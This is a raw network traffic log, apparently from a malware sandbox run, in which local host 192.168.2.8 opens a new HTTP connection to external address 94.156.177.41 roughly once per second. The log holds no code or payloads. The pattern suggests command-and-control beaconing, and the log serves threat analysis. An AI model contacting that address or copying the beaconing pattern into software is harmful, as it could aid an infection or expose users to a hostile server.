Jan 11, 2025 01:43:42.794318914 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.794353962 CET	51309	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.799055099 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.940957069 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.945832968 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.945933104 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.948031902 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.952845097 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.952923059 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.957781076 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.674802065 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.674861908 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.674930096 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.676816940 CET	51315	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.681663036 CET	80	51315	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.889087915 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.894138098 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.894227982 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.897336006 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.902261019 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:43.902307987 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:43.907664061 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.613955975 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.614068031 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.614115953 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.614168882 CET	51321	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.618931055 CET	80	51321	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.770216942 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.775341988 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.776108980 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.778259039 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.783154964 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:44.785245895 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:44.790208101 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.582261086 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.582308054 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.582362890 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.582416058 CET	51327	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.587335110 CET	80	51327	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.723819971 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.728985071 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.729094028 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.731091022 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.736027002 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:45.736145973 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:45.741134882 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.438195944 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.438306093 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.438298941 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.438385963 CET	51333	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.443133116 CET	80	51333	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.581696033 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.586608887 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.587749004 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.589720011 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.594610929 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:46.597242117 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:46.602137089 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.295649052 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.295741081 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.295907021 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.296061039 CET	51339	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.300887108 CET	80	51339	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.445804119 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.450692892 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.450779915 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.452958107 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.457757950 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:47.457823038 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:47.462645054 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.196427107 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.196486950 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.196551085 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.196587086 CET	51346	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.201435089 CET	80	51346	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.346395969 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.351371050 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.351519108 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.353506088 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.358393908 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:48.358447075 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:48.363357067 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.076029062 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.076138973 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.076168060 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.076222897 CET	51353	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.080933094 CET	80	51353	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.221280098 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.228681087 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.228755951 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.230825901 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.238223076 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.238276958 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.245608091 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.953025103 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.953063011 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:49.953109026 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.953149080 CET	51360	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:49.958039999 CET	80	51360	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.099953890 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.105307102 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.105412006 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.107481956 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.112793922 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.112870932 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.117697001 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.836159945 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.836272955 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.836272955 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.836323023 CET	51368	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.841092110 CET	80	51368	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.979784012 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.984714985 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.984780073 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.987092018 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.991880894 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:50.991939068 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:50.996978998 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.718250990 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.718410969 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.718554020 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.718554020 CET	51374	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.724102974 CET	80	51374	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.860747099 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.865564108 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.865700960 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.867959023 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.872735023 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:51.872833014 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:51.877650976 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:52.589922905 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:52.590086937 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:52.590106010 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:52.590151072 CET	51380	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:52.594954014 CET	80	51380	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:52.998989105 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.004230022 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.004303932 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.006314039 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.011161089 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.011219025 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.016115904 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.747992039 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.748076916 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.748109102 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.748182058 CET	51388	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.752979040 CET	80	51388	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.891999006 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.896940947 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.897030115 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.899141073 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.903990030 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:53.904053926 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:53.908857107 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.614797115 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.614974022 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.615052938 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.615087032 CET	51395	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.621180058 CET	80	51395	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.751674891 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.756659985 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.756788015 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.758891106 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.763710022 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:54.763803959 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:54.768624067 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.488706112 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.488725901 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.488807917 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.488838911 CET	51403	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.493720055 CET	80	51403	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.914041996 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.918983936 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.919050932 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.921688080 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.926664114 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:55.926731110 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:55.931544065 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.636090994 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.636117935 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.636236906 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.636277914 CET	51406	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.641710043 CET	80	51406	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.786722898 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.791945934 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.792062998 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.794159889 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.798973083 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:56.799040079 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:56.804398060 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.548434019 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.548542976 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.548619032 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.548655033 CET	51415	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.553447008 CET	80	51415	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.694571972 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.699683905 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.699760914 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.701728106 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.706665039 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:57.706794024 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:57.711680889 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.432677984 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.432751894 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.432809114 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.432904005 CET	51421	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.437745094 CET	80	51421	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.594466925 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.599612951 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.599723101 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.601829052 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.606654882 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:58.606872082 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:58.611799955 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.293932915 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.294044018 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.294217110 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.294217110 CET	51427	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.299201012 CET	80	51427	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.446618080 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.451618910 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.451807022 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.453828096 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.458775043 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:59.461313009 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:59.466202021 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.168755054 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.168919086 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.169224977 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.169286966 CET	51433	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.175055027 CET	80	51433	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.314980984 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.320259094 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.320446968 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.322475910 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.327671051 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:00.327730894 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:00.332866907 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.029828072 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.029947996 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.029999018 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.030033112 CET	51439	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.035626888 CET	80	51439	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.194091082 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.199023008 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.199109077 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.201200962 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.205971956 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.206037045 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.210891008 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.910991907 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.911057949 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:01.911205053 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.911205053 CET	51446	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:01.916037083 CET	80	51446	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.054730892 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.059688091 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.059791088 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.061801910 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.066627026 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.066708088 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.071476936 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.787935972 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.788084984 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:02.788147926 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.815817118 CET	51454	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:02.820874929 CET	80	51454	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.038075924 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.044334888 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.044410944 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.046463013 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.052267075 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.052321911 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.057166100 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.775012016 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.775125027 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.775166035 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.776016951 CET	51459	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.779928923 CET	80	51459	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.926332951 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.931358099 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.931701899 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.933855057 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.938709021 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:03.938793898 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:03.943736076 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.664005041 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.664026976 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.664083958 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.664117098 CET	51468	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.668927908 CET	80	51468	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.862840891 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.867932081 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.868012905 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.869992018 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.874828100 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:04.874882936 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:04.879750967 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.575776100 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.575800896 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.575861931 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.575901985 CET	51474	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.580867052 CET	80	51474	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.887398958 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.892401934 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.892481089 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.895147085 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.900064945 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:05.900134087 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:05.905035973 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.644947052 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.645011902 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.645085096 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.645147085 CET	51480	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.649945974 CET	80	51480	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.782222986 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.787094116 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.787199020 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.789382935 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.794236898 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:06.794404030 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:06.799180031 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.690494061 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.690583944 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.690649986 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.690742970 CET	51486	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.695554018 CET	80	51486	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.830637932 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.835510015 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.835716009 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.837692022 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.842506886 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:07.842580080 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:07.849090099 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.542829037 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.542850018 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.542954922 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:08.565035105 CET	51497	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:08.569896936 CET	80	51497	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.793912888 CET	51503	80	192.168.2.8	94.156.177.41
